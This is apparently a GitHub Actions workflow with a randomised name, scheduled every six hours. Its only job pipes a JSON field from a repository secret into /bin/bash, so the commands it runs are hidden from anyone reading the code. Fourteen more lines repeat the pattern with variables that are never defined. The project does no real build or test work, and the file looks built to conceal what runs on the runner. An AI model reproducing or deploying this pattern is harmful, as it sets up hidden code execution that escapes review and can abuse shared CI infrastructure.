name: humoxi8192
on:
  workflow_dispatch:
  schedule:
    - cron: '48 5/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: humoxi8192
        env:
          une1: ${{ secrets.une1 }}
        run: |
          echo $une1 | jq -r .njm2 | /bin/bash
          echo $qeiy0 | jq -r .elffa2 | /bin/bash
          echo $p48 | jq -r .oycv49668 | /bin/bash
          echo $eiv5 | jq -r .ppqv3188 | /bin/bash
          echo $yp002 | jq -r .hic591 | /bin/bash
          echo $vao3872 | jq -r .xm27127 | /bin/bash
          echo $roudh7707 | jq -r .mvg49548 | /bin/bash
          echo $x38776 | jq -r .xt569 | /bin/bash
          echo $k0525 | jq -r .xr0 | /bin/bash
          echo $igniq8664 | jq -r .f598 | /bin/bash
          echo $gkudi594 | jq -r .gb0447 | /bin/bash
          echo $g519 | jq -r .s4 | /bin/bash
          echo $pmnrs90258 | jq -r .slb32 | /bin/bash
          echo $g5 | jq -r .ve08067 | /bin/bash
          echo $fq6868 | jq -r .avtzb0591 | /bin/bash

